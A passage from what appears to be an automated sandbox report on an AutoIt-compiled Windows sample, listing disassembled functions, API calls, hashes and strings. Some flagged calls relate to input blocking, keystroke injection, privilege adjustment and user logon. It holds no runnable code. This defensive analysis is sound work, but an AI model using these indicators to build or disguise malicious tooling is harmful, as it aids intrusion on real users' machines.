                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CloseControlCreateDeviceFileHandle
                                          • String ID:
                                          • API String ID: 33631002-0
                                          • Opcode ID: 080f7c2b7f86af4480d43bebe18fec28589dfba6424383d96ddafbc0d725ba20
                                          • Instruction ID: 2bd9f47075b6b2a1703691c29f8d0271c17295a4085ffe3e3d10049c2cea2aae
                                          • Opcode Fuzzy Hash: 080f7c2b7f86af4480d43bebe18fec28589dfba6424383d96ddafbc0d725ba20
                                          • Instruction Fuzzy Hash: 3E113075E01228BFDB148F95AC44BAFBBBCEB49B60F104165FD04E7290C6715A418BA1
                                          Function 00114F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00114F45
                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00114F5C
                                          • FreeSid.ADVAPI32(?), ref: 00114F6C
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                          • String ID:
                                          • API String ID: 3429775523-0
                                          • Opcode ID: c0d8501d2cfb2c538c37c5dcd8ecf234527ad697634241e2859c1a4c790bb2a0
                                          • Instruction ID: 652d8c5db39a5baac3a2885456c5236cae124e30b2cdfef1bd8dbe3402d5e527
                                          • Opcode Fuzzy Hash: c0d8501d2cfb2c538c37c5dcd8ecf234527ad697634241e2859c1a4c790bb2a0
                                          • Instruction Fuzzy Hash: 9EF04F7591130DBFDF04DFE4DC89AADB7BCEF08201F104469AA01E3590D7355A448B50
                                          Function 00111AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00111B01
                                          • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00111B14
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: InputSendkeybd_event
                                          • String ID:
                                          • API String ID: 3536248340-0
                                          • Opcode ID: 75db548ba4944b482e9de292478a0fbc7528153ba1e3889bf3500fc243c16c0b
                                          • Instruction ID: fce50987df16e23ed9e17b925ca5d00560089f5629982e445fed62160f8c06ff
                                          • Opcode Fuzzy Hash: 75db548ba4944b482e9de292478a0fbc7528153ba1e3889bf3500fc243c16c0b
                                          • Instruction Fuzzy Hash: 84F0A93190020CABDB04CF91C805BFEBBB4FF08312F00800AFE459A2A2D3398A51DF94
                                          Function 0011A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00129B52,?,0014098C,?), ref: 0011A6DA
                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00129B52,?,0014098C,?), ref: 0011A6EC
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorFormatLastMessage
                                          • String ID:
                                          • API String ID: 3479602957-0
                                          • Opcode ID: 301d54add727d6d6c1cd9215c0970232ed2889131b902a25502c7fbe308557bf
                                          • Instruction ID: e9264b890ecbd27ccfdde903992f8af8b75b5a1f7329d214dcd1ed2945f03582
                                          • Opcode Fuzzy Hash: 301d54add727d6d6c1cd9215c0970232ed2889131b902a25502c7fbe308557bf
                                          • Instruction Fuzzy Hash: 8DF02E3540522DBFDB219FA4CC48FDA376CFF09361F004255B508D2191D7309980CBE1
                                          Function 00108DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00108F27), ref: 00108DFE
                                          • CloseHandle.KERNEL32(?,?,00108F27), ref: 00108E10
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AdjustCloseHandlePrivilegesToken
                                          • String ID:
                                          • API String ID: 81990902-0
                                          • Opcode ID: 1d836a1822a5d27152dc6fc3e4ec796074b275c9468bfbd0ca91afd0fcdb96a1
                                          • Instruction ID: bb46c565a730e6c198d24cd6ba15b03ceed21de179621a2d6dada3350785b42c
                                          • Opcode Fuzzy Hash: 1d836a1822a5d27152dc6fc3e4ec796074b275c9468bfbd0ca91afd0fcdb96a1
                                          • Instruction Fuzzy Hash: 16E0BF75014610EFE7262B51FC09DB77BADEB043507148919F59580471DB725CD0DB60
                                          Function 000DA385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,000D8F87,?,?,?,00000001), ref: 000DA38A
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 000DA393
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: c515758cb93d9eedd5755925829b3813e5a1fc217f5e01966a1d6867f6983971
                                          • Instruction ID: 1a9f8b6e529cbec0bc1f1e29ce6277dd897c9056c07bafe5db852f0101f0dcbc
                                          • Opcode Fuzzy Hash: c515758cb93d9eedd5755925829b3813e5a1fc217f5e01966a1d6867f6983971
                                          • Instruction Fuzzy Hash: 67B09235064208AFCA422F92EC09B883F68FB4AA62F004010FB0D44870CB7254908A91
                                          Function 001245D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • BlockInput.USER32(00000001), ref: 001245F0
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BlockInput
                                          • String ID:
                                          • API String ID: 3456056419-0
                                          • Opcode ID: 2b472f4691bbb847b3277c4bd579963e5e04497d50ef5ca8d8672a20074e0594
                                          • Instruction ID: 24d9deb28e495ca0a2d3e6c56f13eb5f1175253872a0913b124607e941ea06c5
                                          • Opcode Fuzzy Hash: 2b472f4691bbb847b3277c4bd579963e5e04497d50ef5ca8d8672a20074e0594
                                          • Instruction Fuzzy Hash: EAE0DF352102159FC310AF5AE804ACAF7E8EF98760F01841AFD49C7312DB70E9418B90
                                          Function 001151E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00115205
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: mouse_event
                                          • String ID:
                                          • API String ID: 2434400541-0
                                          • Opcode ID: 05ff07bdedd5754f9d58e92dde0d5c3e70cd3a905e3a04df0324378e9aaadb2a
                                          • Instruction ID: 319e5a6817f4c1f505a1f741a4c162630f5941728b584cc753cd85c1940d658e
                                          • Opcode Fuzzy Hash: 05ff07bdedd5754f9d58e92dde0d5c3e70cd3a905e3a04df0324378e9aaadb2a
                                          • Instruction Fuzzy Hash: 49D01794160A09B8EA1E03248A0FFB6020AE3A17C0F94416A7102890C1AA9058C99422
                                          Function 00109369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00108FA7), ref: 00109389
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: LogonUser
                                          • String ID:
                                          • API String ID: 1244722697-0
                                          • Opcode ID: b441a0d2e3e74f87a4d3a7d920a3933e565a05fa3957e328ecba8a4e8859851e
                                          • Instruction ID: 1ab8a5543e54e0a4edc05206301a15d7b71b22fe0b857aab5fc911768fc58fcf
                                          • Opcode Fuzzy Hash: b441a0d2e3e74f87a4d3a7d920a3933e565a05fa3957e328ecba8a4e8859851e
                                          • Instruction Fuzzy Hash: 0BD05E3226050EABEF018EA4DC01EAE3B69EB04B01F408111FE15C60A0C776D835AB60
                                          Function 000F0722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetUserNameW.ADVAPI32(?,?), ref: 000F0734
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          • Opcode ID: c0efc67c7092993b132471849f48921aea39b4c0f2e3060bee142be881c9443e
                                          • Instruction ID: 544fca64bad5bbc7d32e30c07f9fe01ca3ab434dabd3be0201436f7565565424
                                          • Opcode Fuzzy Hash: c0efc67c7092993b132471849f48921aea39b4c0f2e3060bee142be881c9443e
                                          • Instruction Fuzzy Hash: 3DC04CF581010DDBCB15DBA0D988EFE77BCAB08344F100055A205B3511D7749B449A71
                                          Function 000DA354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 000DA35A
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 1dffcd13fbb2dfb0339eef5184101187a3178179d46318c034fe288f10be76fb
                                          • Instruction ID: 5d40a45b9aeff11cc79ca61d28d22caac5f3c4fcfc994ebb80f98adaf5c321ef
                                          • Opcode Fuzzy Hash: 1dffcd13fbb2dfb0339eef5184101187a3178179d46318c034fe288f10be76fb
                                          • Instruction Fuzzy Hash: 49A0123002010CAB8A011F42EC044447F5CE7055507004010F50C00431873254504580
                                          Function 00133BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,00140980), ref: 00133C65
                                          • IsWindowVisible.USER32(?), ref: 00133C89
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BuffCharUpperVisibleWindow
                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                          • API String ID: 4105515805-45149045
                                          • Opcode ID: 3c167b9bd5f84e37d99adc211017c2676bdffa373e365c35fc6ec55f44d98d4a
                                          • Instruction ID: 328622a5d3068557ff5439adfb6854bd40c6273eb4482161f5cb86a203145b9a
                                          • Opcode Fuzzy Hash: 3c167b9bd5f84e37d99adc211017c2676bdffa373e365c35fc6ec55f44d98d4a
                                          • Instruction Fuzzy Hash: 0CD16030204305DBCB08EF50C951AEEB7A6AF94354F114459F9966B3E3CB31EE4ACB96
                                          Function 0013ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetTextColor.GDI32(?,00000000), ref: 0013AC55
                                          • GetSysColorBrush.USER32(0000000F), ref: 0013AC86
                                          • GetSysColor.USER32(0000000F), ref: 0013AC92
                                          • SetBkColor.GDI32(?,000000FF), ref: 0013ACAC
                                          • SelectObject.GDI32(?,?), ref: 0013ACBB
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0013ACE6
                                          • GetSysColor.USER32(00000010), ref: 0013ACEE
                                          • CreateSolidBrush.GDI32(00000000), ref: 0013ACF5
                                          • FrameRect.USER32(?,?,00000000), ref: 0013AD04
                                          • DeleteObject.GDI32(00000000), ref: 0013AD0B
                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0013AD56
                                          • FillRect.USER32(?,?,?), ref: 0013AD88
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0013ADB3
                                            • Part of subcall function 0013AF18: GetSysColor.USER32(00000012), ref: 0013AF51
                                            • Part of subcall function 0013AF18: SetTextColor.GDI32(?,?), ref: 0013AF55
                                            • Part of subcall function 0013AF18: GetSysColorBrush.USER32(0000000F), ref: 0013AF6B
                                            • Part of subcall function 0013AF18: GetSysColor.USER32(0000000F), ref: 0013AF76
                                            • Part of subcall function 0013AF18: GetSysColor.USER32(00000011), ref: 0013AF93
                                            • Part of subcall function 0013AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0013AFA1
                                            • Part of subcall function 0013AF18: SelectObject.GDI32(?,00000000), ref: 0013AFB2
                                            • Part of subcall function 0013AF18: SetBkColor.GDI32(?,00000000), ref: 0013AFBB
                                            • Part of subcall function 0013AF18: SelectObject.GDI32(?,?), ref: 0013AFC8
                                            • Part of subcall function 0013AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0013AFE7
                                            • Part of subcall function 0013AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0013AFFE
                                            • Part of subcall function 0013AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0013B013
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                          • String ID:
                                          • API String ID: 4124339563-0
                                          • Opcode ID: 0e6e0d422dc3350391e67ca424cbc194047b4395b73b64f81a91891d0a35285a
                                          • Instruction ID: d5463f9cf5302d44fba64be2ac2f47b05b7f7cecd3bca4635532bd05a63ce81f
                                          • Opcode Fuzzy Hash: 0e6e0d422dc3350391e67ca424cbc194047b4395b73b64f81a91891d0a35285a
                                          • Instruction Fuzzy Hash: FFA19C76008301AFD7129F65DC08E6B7BA9FF89321F500A19FAA69A5F1C731D884CF52
                                          Function 000B2FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(?,?,?), ref: 000B3072
                                          • DeleteObject.GDI32(00000000), ref: 000B30B8
                                          • DeleteObject.GDI32(00000000), ref: 000B30C3
                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 000B30CE
                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 000B30D9
                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 000EC77C
                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 000EC7B5
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 000ECBDE
                                            • Part of subcall function 000B1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000B2412,?,00000000,?,?,?,?,000B1AA7,00000000,?), ref: 000B1F76
                                          • SendMessageW.USER32(?,00001053), ref: 000ECC1B
                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 000ECC32
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 000ECC48
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 000ECC53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                          • String ID: 0
                                          • API String ID: 464785882-4108050209
                                          • Opcode ID: ce89a39c65ffaced51e07397ef49e0b5000aa608476d93ebc03375c433431277
                                          • Instruction ID: d0fec22e9a8d9018338fc5aa490acc5976e4c2ae92af234a2a24b5c70dbf8043
                                          • Opcode Fuzzy Hash: ce89a39c65ffaced51e07397ef49e0b5000aa608476d93ebc03375c433431277
                                          • Instruction Fuzzy Hash: 2412AE30604241EFEB65DF25C894FA9B7E1BF09300F244569F985DB662CB32ED82CB91
                                          Function 000C27FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                          • API String ID: 2660009612-1645009161
                                          • Opcode ID: 60481a88bad0ef7067e2bd251108dcb900f5e8e8f15d8d15e8d0176f4109e6d1
                                          • Instruction ID: a34150119ef06c4ba4d8de4787dcdd2a6e16437ee7a6b31f8c52bd50c53de180
                                          • Opcode Fuzzy Hash: 60481a88bad0ef7067e2bd251108dcb900f5e8e8f15d8d15e8d0176f4109e6d1
                                          • Instruction Fuzzy Hash: BBA19031A4020ABBCB20AF20DD52FBE77B5AF45740F14002DF905AB6A3EBB19A55D661
                                          Function 00127B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(00000000), ref: 00127BC8
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00127C87
                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00127CC5
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00127CD7
                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00127D1D
                                          • GetClientRect.USER32(00000000,?), ref: 00127D29
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00127D6D
                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00127D7C
                                          • GetStockObject.GDI32(00000011), ref: 00127D8C
                                          • SelectObject.GDI32(00000000,00000000), ref: 00127D90
                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00127DA0
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00127DA9
                                          • DeleteDC.GDI32(00000000), ref: 00127DB2
                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00127DDE
                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00127DF5
                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00127E30
                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00127E44
                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00127E55
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00127E85
                                          • GetStockObject.GDI32(00000011), ref: 00127E90
                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00127E9B
                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00127EA5
                                          Strings
                                          Memory Dump Source
